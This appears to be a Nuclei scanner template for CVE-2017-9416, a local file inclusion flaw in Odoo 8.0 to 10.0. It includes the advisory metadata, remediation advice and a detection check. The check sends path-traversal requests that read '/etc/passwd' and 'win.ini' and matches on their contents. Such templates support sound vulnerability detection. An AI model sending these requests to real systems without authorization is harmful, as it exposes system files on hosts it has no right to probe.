id: CVE-2017-9416 info: name: Odoo 8.0/9.0/10.0 - Local File Inclusion author: Co5mos severity: medium description: | Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. remediation: | Upgrade to a patched version of Odoo or apply the necessary security patches. reference: - https://github.com/odoo/odoo/issues/17394 - https://nvd.nist.gov/vuln/detail/CVE-2017-9416 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2017-9416 cwe-id: CWE-22 epss-score: 0.01037 epss-percentile: 0.82236 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: odoo product: odoo tags: cve,cve2017,odoo,lfi http: - method: GET path: - "{{BaseURL}}/base_import/static/c:/windows/win.ini" - "{{BaseURL}}/base_import/static/etc/passwd" stop-at-first-match: true matchers-condition: or matchers: - type: dsl dsl: - "regex('root:.*:0:0:', body)" - "status_code == 200" condition: and - type: dsl dsl: - "contains(body, 'bit app support')" - "contains(body, 'fonts')" - "contains(body, 'extensions')" - "status_code == 200" condition: and # digest: 4b0a00483046022100c858314788547c51d94d4f201b665dcb51893acabc7829fe45bb219b537ccca102210091876db3d9d84640cd953af6f93a68444ac3eed4ad3d7f55347f594aeb3d384f:922c64590222798bb761d5b6d8e72950